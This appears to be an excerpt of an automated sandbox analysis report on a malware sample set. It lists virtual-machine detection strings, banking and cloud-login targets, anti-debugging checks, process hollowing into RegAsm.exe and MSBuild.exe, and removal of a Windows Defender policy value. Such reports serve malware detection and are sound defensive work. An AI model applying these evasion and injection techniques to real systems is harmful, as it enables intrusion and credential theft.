                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2434788379.0000000005F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_EAC95D3A9uNEl3eJu
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2385443354.0000000001BBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2342949093.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2346546145.0000000002B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2061989143.00000000004D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comVMware20,11696428655o
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: CHA0VZiz8y.exe, 00000000.00000000.2042780936.0000000140AAD000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: <$hGfSuA_A
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rootpagecomVMware20,11696428655o
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2336310475.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2336021769.0000000002B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
                      Source: MYZqYdU5cUVwEz2j0JYbnTar.exe, 00000011.00000002.2593523697.0000000002C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageformVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
                      Source: svchost.exe, 00000002.00000002.2358453390.000001F785C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2351488770.0000000002B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2434788379.0000000005F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_EAC95D3A
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2356479664.0000000002B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeAPI call chain: ExitProcess graph end nodegraph_7-41079
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeAPI call chain: ExitProcess graph end nodegraph_7-40906
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeProcess queried: DebugPort
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeProcess queried: DebugPort
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeProcess queried: DebugPort
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeProcess queried: DebugPort
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeProcess queried: DebugPort
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0217171C rdtsc 7_2_0217171C
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0040D1E4 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_0040D1E4
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0040D1E4 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_0040D1E4
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6895B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,14_2_6895B6C0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_021700A3 push dword ptr fs:[00000030h]7_2_021700A3
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02210042 push dword ptr fs:[00000030h]7_2_02210042
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_0045C1CD mov ecx, dword ptr fs:[00000030h]9_2_0045C1CD
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_0046547E mov eax, dword ptr fs:[00000030h]9_2_0046547E
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AAC1CD mov ecx, dword ptr fs:[00000030h]11_2_00AAC1CD
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AB547E mov eax, dword ptr fs:[00000030h]11_2_00AB547E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0041153F __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,7_2_0041153F
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_00407166 SetUnhandledExceptionFilter,7_2_00407166
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_00407197 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00407197
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_00455095 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00455095
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_00458E0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00458E0B
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_00454E26 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00454E26
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_00454F82 SetUnhandledExceptionFilter,9_2_00454F82
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AA5095 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00AA5095
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AA4E26 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00AA4E26
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AA8E0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00AA8E0B
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AA4F82 SetUnhandledExceptionFilter,11_2_00AA4F82
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689AB144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_689AB144
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689A948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_689A948B
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: ogoGQsWFwF_EcodN5qF7hiVC.exe PID: 3056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zfQlIB6J8n2u_zLV5LHnA1xW.exe PID: 3920, type: MEMORYSTR
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeMemory allocated: C:\Users\user\AppData\Local\Temp\kat806.tmp base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02210110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_02210110
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpywareJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtQueryInformationProcess: Indirect: 0x140D79DBCJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtQueryInformationProcess: Indirect: 0x140737CF6Jump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtSetInformationThread: Indirect: 0x14074EFD4Jump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtQuerySystemInformation: Indirect: 0x140D20A0EJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtClose: Direct from: 0x140F911D1
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x141606519
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtOpenFile: Direct from: 0x141915E9B
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x140FBD813
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x1418E9585
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtQueryInformationProcess: Indirect: 0x140D79F0BJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x14190A4AE
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x14190078A
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtQueryInformationProcess: Indirect: 0x140737BBAJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Indirect: 0x140F737CE
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtSetInformationThread: Indirect: 0x140D9A2ABJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeNtQuerySystemInformation: Indirect: 0x1406D842BJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x140F9015F
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x1418AC1C4
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x1415F89C3
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeNtProtectVirtualMemory: Direct from: 0x1418BCD9F
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeMemory written: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeMemory written: C:\Users\user\AppData\Local\Temp\kat806.tmp base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeSection unmapped: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exe base address: 400000
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base address: 400000
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1073008
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DC0008
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeMemory written: C:\Users\user\AppData\Local\Temp\kat806.tmp base: 400000
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeMemory written: C:\Users\user\AppData\Local\Temp\kat806.tmp base: 401000
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeMemory written: C:\Users\user\AppData\Local\Temp\kat806.tmp base: 422000
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeMemory written: C:\Users\user\AppData\Local\Temp\kat806.tmp base: 42E000
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeMemory written: C:\Users\user\AppData\Local\Temp\kat806.tmp base: 641000
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000
